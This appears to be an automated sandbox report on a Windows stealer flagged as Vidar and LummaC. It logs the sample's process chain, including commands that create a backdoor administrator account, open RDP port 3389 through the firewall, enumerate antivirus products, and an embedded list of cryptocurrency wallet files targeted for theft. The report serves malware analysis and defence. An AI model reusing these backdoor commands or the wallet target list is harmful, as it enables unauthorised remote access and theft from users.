Source: C:\ProgramData\GIEHJDHCBA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\CFHIIEHJKK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\ProgramData\CFHIIEHJKK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_0d457744 eU6fmVsXHNUV /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_0d457744 eU6fmVsXHNUV /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_0d457744 /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_0d457744 /add

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_6CB44760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

6_2_6CB44760

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_6CA21C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

6_2_6CA21C30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_0040111D cpuid

6_2_0040111D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	6_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_0042B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_0042B1C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	6_2_00429A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_0042B268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_0042B2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	6_2_0042AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	6_2_004253E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_0042B494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	6_2_0042749C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesA,	6_2_0042B556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	6_2_00429D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	6_2_0042E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	6_2_00427576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	6_2_00428DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_0042B5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_0042B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	6_2_0042B623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	6_2_0042E6A4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Queries volume information: C:\ProgramData\GIEHJDHCBA.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Queries volume information: C:\ProgramData\BKKFCFBKFC.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\CFHIIEHJKK.exe	Queries volume information: C:\ProgramData\CFHIIEHJKK.exe VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,

6_2_0041C0E9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

6_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

6_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_6CA48390 NSS_GetVersion,

6_2_6CA48390

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

Uses netsh to modify the Windows network and firewall settings

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: iles%\Windows Defender\MsMpeng.exe
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2061826674.000000000117A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.000000000135A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1968024042.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.file.exe.41f5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.41f5570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1334300734.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5640, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
